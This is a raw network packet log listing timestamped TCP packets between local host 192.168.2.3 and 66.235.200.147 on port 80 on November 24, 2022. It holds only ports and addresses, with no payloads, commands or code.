Nov 24, 2022 12:20:03.467597961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467609882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467627048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467638969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467664957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467668056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467680931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467695951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467720032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467722893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467752934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467756987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467768908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467782021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467803001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467808962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467818975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467820883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467839956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467840910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467859983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467868090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467896938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467919111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467921972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467921972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467936993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467953920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467961073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467962980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467983007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467991114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468002081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468022108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468053102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468080997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468081951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468110085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468113899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468141079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468153000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468162060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468168020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468183994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468199015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468211889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468226910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468241930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468256950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468269110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468286037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468296051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468317032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468327999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468344927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468374968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468383074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468404055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468411922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468434095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468444109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468462944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468492031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468502045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468522072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468530893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468549967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468569040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468579054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468591928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468607903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468621016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468636036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468657970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468667030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468688965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468697071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468724012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468744993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468751907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468771935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468780041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468805075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468806982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468820095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468835115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468862057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468888998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468894005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468911886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468919039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468940973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468947887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468961954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.468977928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.468987942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469007969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469036102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469048977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469063997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469077110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469091892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469103098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469120026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469132900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469146967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469160080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469175100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469182968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469202995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469230890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469242096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469258070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469269991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469285965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469307899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469336987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469336987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469364882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469364882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469393969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469393969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469413042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469422102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469432116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469450951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469460964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469480991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469508886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469521046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469537020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469553947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469564915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469580889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469594955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469605923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469624043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469639063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469652891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469681978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469701052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469708920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469736099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469737053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469765902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469767094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469785929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469791889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469805002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469820976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469834089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469849110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469858885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469877005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469906092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469930887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469934940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469950914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469963074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.469980955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.469990969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470002890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470020056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470050097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470068932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470077038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470101118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470105886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470132113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470134020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470155954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470159054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470172882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470189095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470201969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470216990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470227003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470244884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470273018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470293999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470300913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470328093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470333099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470355988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470366001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470383883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470386982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470397949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470412016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470418930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470439911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470454931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470468998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470482111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470496893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470515966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470534086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470558882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470560074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470570087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470587015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470616102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470617056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470637083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470643044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470668077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470670938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470689058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470700979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470711946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470729113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470757961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470777988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470789909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470807076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470818996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470837116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470846891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470885992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470890999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470901012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470925093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470947027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470966101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.470973015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.470983982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471003056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471009970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471019983 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471039057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471049070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471060038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471077919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471079111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471097946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471101046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471116066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471131086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471136093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471158981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471168041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471187115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471195936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471215963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471246958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471257925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471275091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471283913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471304893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471316099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471333981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471340895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471364975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471384048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.471393108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.471435070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.474139929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476449013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476496935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476517916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476536036 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476553917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476572037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476593018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476607084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476622105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476640940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476658106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476660013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476680040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476680994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476699114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476701975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476717949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476742029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476743937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476763964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476774931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476783037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476800919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476803064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476819038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476833105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476839066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476857901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476862907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476876974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476895094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476896048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476911068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476933956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476944923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476953030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476963997 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.476969957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476990938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.476995945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477009058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477024078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477027893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477046967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477056980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477066040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477085114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477103949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477109909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477109909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477122068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477139950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477142096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477153063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477158070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477176905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477189064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477194071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477211952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477217913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477231979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477231979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477251053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477257013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477268934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477273941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477287054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477291107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477305889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477308989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477324009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477328062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477341890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477343082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477364063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477368116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477386951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477394104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477399111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477421045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477448940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477459908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477477074 CET	80	49710	66.235.200.147	192.168.2.3
